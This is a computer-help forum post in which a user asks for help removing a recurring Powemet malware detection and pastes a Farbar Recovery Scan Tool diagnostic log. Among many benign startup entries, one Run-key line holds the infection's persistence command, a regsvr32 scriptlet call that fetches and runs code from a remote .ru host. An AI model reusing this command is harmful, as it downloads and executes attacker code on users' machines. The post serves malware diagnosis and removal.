Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with Behavior:Win32/Powemet.B!attk


  • This topic is locked This topic is locked
5 replies to this topic

#1 Gaya19

Gaya19

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:12:16 AM

Posted 18 August 2017 - 08:37 PM

Hi. My laptop is running Windows 8.1. After I inserted a USB thumb drive, Windows Defender detected Behavior:Win32/Powemet.B!attk. Windows Defender quarantines the infected files and I then delete them; however, every time I start the computer, the same virus is detected again by Windows Defender.

 

An example message in Windows Defender:  

Category: Suspicious Behavior
Description: This program is dangerous and executes commands from an attacker.
Recommended action: Remove this software immediately.
Items: 
behavior:pid:3340:94227975697806
process:pid:3340,ProcessStart:131475718717781479

 

I have tried using Malwarebytes, but it didn't seem to detect this Behavior:Win32/Powemet.B!attk. I tried installing Avast, Bitdefender and Kaspersky, but it seems they could not be installed properly (I don't know why). I'm at my wit's end so thanks so much in advance for your help.

 

 

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 18-08-2017
Ran by Ligaya (administrator) on DELL (19-08-2017 09:20:43)
Running from C:\Users\Ligaya\Desktop
Loaded Profiles: UpdatusUser & Ligaya (Available Profiles: UpdatusUser & Ligaya)
Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (with Networking)
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpUXSrv.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6846096 2012-11-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1253520 2012-11-20] (Realtek Semiconductor)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3759504 2012-09-13] (Dell Inc.)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [IntelTBRunOnce] => wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2917688 2012-09-08] (Synaptics Incorporated)
HKLM\...\Run: [DellWPF] => C:\Program Files\Synaptics\SynTP\DellTouchpad.exe [4875576 2012-09-08] ()
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [277504 2012-07-10] (Intel Corporation)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-01-21] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2014-10-11] (Apple Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2015-09-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2015-09-24] (Adobe Systems Inc.)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1058912 2012-04-02] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [4513792 2014-05-22] (Brother Industries, Ltd.)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-1090255531-1958037965-2896169239-1001\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2014-10-29] (Microsoft Corporation)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Run: [Google Update] => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-11-13] (Google Inc.)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Run: [Skype] => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\RunOnce: [Adobe Speed Launcher] => 1418274198
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [Google Update] => C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-29] (Google Inc.)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [Google Photos Backup] => C:\Users\Ligaya\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [Dropbox Update] => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== ATTENTION
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {426410b4-8269-11e4-819a-606c66264890} - "E:\Setup.exe" /s
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {42641449-8269-11e4-819a-606c66264890} - "E:\Setup.exe" /s
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {48bbcfac-83c0-11e5-81c6-606c66264890} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {608524fd-0114-11e5-81b9-606c66264890} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {ad1936dc-7b47-11e4-8190-7845c4c1808f} - "E:\Setup.exe" /s
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [168616 2013-12-18] (NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ImageBrowser EX Agent.lnk [2014-11-10]
ShortcutTarget: ImageBrowser EX Agent.lnk -> C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe ()
Startup: C:\Users\Gaya\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2014-11-15]
ShortcutTarget: Dropbox.lnk -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Ligaya\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-13]
ShortcutTarget: Dropbox.lnk -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{E25DAE67-1539-483B-93E5-AF4722F3917E}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{FAD7ED5C-CCBA-4E06-A052-C84A718F1B8F}: [DhcpNameServer] 172.8.1.1
 
Internet Explorer:
==================
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://dell13.msn.com
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://dell13.msn.com
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com
URLSearchHook: [S-1-5-21-1090255531-1958037965-2896169239-1001] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\.DEFAULT -> DefaultScope {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\.DEFAULT -> {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> DefaultScope {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004 -> DefaultScope {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004 -> {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-01-21] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-01-21] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-24] (Oracle Corporation)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-24] (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
Toolbar: HKU\.DEFAULT -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
 
FireFox:
========
FF ProfilePath: C:\Users\Ligaya\AppData\Roaming\Mozilla\Firefox\Profiles\qadwysdp.default-1454852340919 [2017-08-18]
FF Homepage: Mozilla\Firefox\Profiles\qadwysdp.default-1454852340919 -> hxxp://smalltowngirlsmidnighttrains.com/
FF Extension: (Click-to-Play staged rollout) - C:\Program Files (x86)\Mozilla Firefox\browser\features\clicktoplay-rollout@mozilla.org.xpi [2017-07-10] [not signed]
FF Extension: (Follow-on Search Telemetry) - C:\Program Files (x86)\Mozilla Firefox\browser\features\followonsearch@mozilla.com.xpi [2017-07-01] [not signed]
FF Extension: (Shield Recipe Client) - C:\Program Files (x86)\Mozilla Firefox\browser\features\shield-recipe-client@mozilla.org.xpi [2017-08-01] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2015-10-18] [not signed]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_26_0_0_151.dll [2017-08-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_151.dll [2017-08-09] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-01-24] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-24] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-01-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2012-03-17] (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-08-01] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1002: @citrixonline.com/appdetectorplugin -> C:\Users\Gaya\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2013-09-03] (Citrix Online)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1002: @tools.google.com/Google Update;version=3 -> C:\Users\Gaya\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll [2014-11-13] (Google Inc.)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1002: @tools.google.com/Google Update;version=9 -> C:\Users\Gaya\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll [2014-11-13] (Google Inc.)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1004: @citrixonline.com/appdetectorplugin -> C:\Users\Ligaya\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2017-05-17] (Citrix Online)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1004: @tools.google.com/Google Update;version=3 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1004: @tools.google.com/Google Update;version=9 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default [2017-08-19]
CHR Extension: (Google Slides) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-05]
CHR Extension: (Google Docs) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-05]
CHR Extension: (Google Drive) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22]
CHR Extension: (YouTube) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-31]
CHR Extension: (Google Sheets) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-05]
CHR Extension: (Google Docs Offline) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (Skype) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2017-07-31]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Gmail) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-31]
CHR Extension: (Chrome Media Router) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [282112 2013-09-25] (Brother Industries, Ltd.) [File not signed]
S2 DellDigitalDelivery; c:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [173056 2012-06-20] (Dell Products, LP.) [File not signed]
S2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
S3 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [7168 2012-07-10] (Intel Corporation) [File not signed]
S2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek USB 2.0 Card Reader\RIconMan.exe [2464400 2012-09-08] (Realsil Microelectronics Inc.)
S2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-06-26] (Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273136 2013-08-28] ()
S2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [201872 2012-11-21] (Realtek Semiconductor)
S2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1915480 2013-05-23] (SoftThinks SAS)
S2 Speed Wi-Fi Next setting tool; C:\ProgramData\MobileBrServ\mbbservice.exe [242256 2014-08-20] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-13] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-13] (Microsoft Corporation)
S3 wmiApSrv; C:\WINDOWS\system32\wbem\WmiApSrv.exe [201728 2014-10-29] (Microsoft Corporation)
S2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3378416 2013-08-28] (Intel® Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 androidusb; C:\WINDOWS\System32\Drivers\androidusb.sys [32768 2010-04-29] (Google Inc)
S3 btmhsf; C:\WINDOWS\system32\DRIVERS\btmhsf.sys [857472 2012-08-29] (Motorola Solutions, Inc.)
S3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [10752 2013-01-25] (OSR Open Systems Resources, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 NETwNe64; C:\WINDOWS\system32\DRIVERS\Netwew00.sys [3345376 2013-10-08] (Intel Corporation)
R0 rtcrfilt64; C:\WINDOWS\System32\DRIVERS\rtcrfilt64.sys [19600 2012-09-05] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-09-08] (Synaptics Incorporated)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [43832 2012-09-08] (Synaptics Incorporated)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [274776 2017-01-13] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [117592 2017-01-13] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-08-19 09:20 - 2017-08-19 09:23 - 000021768 _____ C:\Users\Ligaya\Desktop\FRST.txt
2017-08-19 09:20 - 2017-08-19 09:20 - 000000000 ____D C:\FRST
2017-08-19 09:17 - 2017-08-19 09:18 - 002395648 _____ (Farbar) C:\Users\Ligaya\Desktop\FRST64.exe
2017-08-19 08:28 - 2017-08-19 08:28 - 000030126 _____ C:\ProgramData\agent.uninstall.1503102514.bdinstall.bin
2017-08-19 08:13 - 2017-08-19 08:27 - 000000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2017-08-19 08:10 - 2017-08-19 08:10 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\AVAST Software
2017-08-19 08:08 - 2017-08-19 08:09 - 001015880 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw a652a81917d0422.tmp
2017-08-19 08:08 - 2017-08-19 08:09 - 000146704 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw1cb1615eba2846d5.tmp
2017-08-19 08:08 - 2017-08-19 08:09 - 000146696 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswmonflt.sys.150310135598407
2017-08-19 08:08 - 2017-08-19 08:08 - 001015848 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswsnx.sys.150310135598407
2017-08-19 08:08 - 2017-08-19 08:08 - 000585608 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswfc7583a9dafd91dd.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000361336 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw4dd7a693a41e45e8.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000198768 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswb9e193d30d200064.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000146664 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswmonflt.sys.150310134637503
2017-08-19 08:08 - 2017-08-19 08:08 - 000110352 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw7c3edf2a75a39cdb.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000084392 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswefb010485c2b177f.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000046984 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswa8fc28cb1a5f5122.tmp
2017-08-19 08:08 - 2017-08-19 08:07 - 000343288 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\asw91cd079f13a20317.tmp
2017-08-19 08:08 - 2017-08-19 08:07 - 000320008 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\asw71b19f1bd55db8d1.tmp
2017-08-19 08:08 - 2017-08-19 08:07 - 000198976 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\aswefc4a74d8a6e9c9b.tmp
2017-08-19 08:08 - 2017-08-19 08:07 - 000057728 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\asw35bd0693721b3e07.tmp
2017-08-19 07:57 - 2017-08-19 07:57 - 000000000 ____D C:\Program Files\AVAST Software
2017-08-19 07:55 - 2017-08-19 08:08 - 000000000 ____D C:\ProgramData\AVAST Software
2017-08-19 07:51 - 2017-08-19 07:51 - 000030578 _____ C:\ProgramData\agent.update.1503100260.bdinstall.bin
2017-08-19 07:49 - 2017-08-19 08:28 - 000000000 ____D C:\Program Files\Bitdefender Agent
2017-08-19 07:49 - 2017-08-19 07:49 - 000048706 _____ C:\ProgramData\agent.1503100178.bdinstall.bin
2017-08-19 07:49 - 2017-08-19 07:49 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2017-08-18 21:45 - 2017-08-19 07:21 - 000427372 _____ C:\WINDOWS\ntbtlog.txt
2017-08-18 12:22 - 2017-08-18 12:22 - 000180711 _____ C:\Users\Ligaya\Desktop\LIGAYA SABERON (August 20-21, 2017).pdf
